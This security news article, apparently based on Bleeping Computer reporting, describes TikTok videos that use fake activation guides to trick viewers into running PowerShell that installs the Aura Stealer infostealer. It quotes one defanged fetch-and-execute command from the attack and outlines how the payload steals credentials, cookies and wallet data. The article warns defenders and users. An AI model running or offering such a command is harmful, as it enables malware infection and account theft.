TikTok Videos Fueling New ClickFix Infostealer Attacks
▼ Summary
– Cybercriminals are spreading information-stealing malware through TikTok videos disguised as free activation guides for popular software.
– The campaign uses ClickFix attacks that trick users into running malicious PowerShell commands to infect their computers.
– Executed commands download Aura Stealer malware, which collects and uploads saved credentials, cookies, and cryptocurrency wallet data.
– An additional payload is downloaded to self-compile and inject code, though its purpose remains unclear.
– Users should never copy and run commands from untrusted sources and must reset passwords if they followed these instructions.
A concerning new wave of cyberattacks is spreading through TikTok, where deceptive videos promise free access to premium software but instead deliver dangerous information-stealing malware. These posts, masquerading as activation guides for popular applications, are part of a ClickFix social engineering campaign that tricks users into running malicious commands. Security researchers have observed this ongoing threat, which mirrors tactics identified earlier this year.
The fraudulent TikTok videos claim to provide activation methods for legitimate software such as Windows, Microsoft 365, Adobe Creative Suite applications, and CapCut Pro. They also promote entirely fictitious upgrades for services like Netflix and Spotify Premium. Each video displays a short, one-line command and instructs viewers to execute it with administrator privileges in PowerShell. An example command appears as: iex (irm slmgr[.]win/photoshop). The specific program name within the URL changes based on the software being impersonated.
This technique is a classic ClickFix attack, where seemingly helpful instructions lead users to inadvertently run harmful scripts. When the command is executed, PowerShell contacts a remote server to fetch and run another script. This secondary script proceeds to download two executable files from a Cloudflare pages domain. The first file, named updater.exe, is identified as a variant of Aura Stealer malware.
Aura Stealer is a potent infostealer designed to harvest a wide array of sensitive data from infected systems. It collects saved usernames and passwords from web browsers, authentication cookies, cryptocurrency wallet information, and credentials from various other applications. All this stolen data is then transmitted to the attackers’ servers, granting them unauthorized access to the victim’s online accounts.
Security analysis indicates a second payload, source.exe, is also downloaded. This file utilizes the .NET framework’s built-in Visual C# compiler to self-compile code, which is subsequently injected and executed directly in the computer’s memory. The exact purpose of this additional component remains unclear to investigators.
Anyone who has followed these instructions should operate under the assumption that all their login credentials have been compromised. It is critically important to immediately reset passwords for every website and online service you use. ClickFix attacks have surged in popularity over the last twelve months, becoming a common delivery method for malware in ransomware and cryptocurrency theft operations.
As a fundamental security practice, you should never copy text from an untrusted source, such as a social media video or website, and paste it directly into any system command line interface. This includes the Windows File Explorer address bar, Command Prompt, PowerShell, macOS Terminal, or Linux shell. Always obtain software and activation keys directly from official vendors and distributors.
(Source: Bleeping Computer)
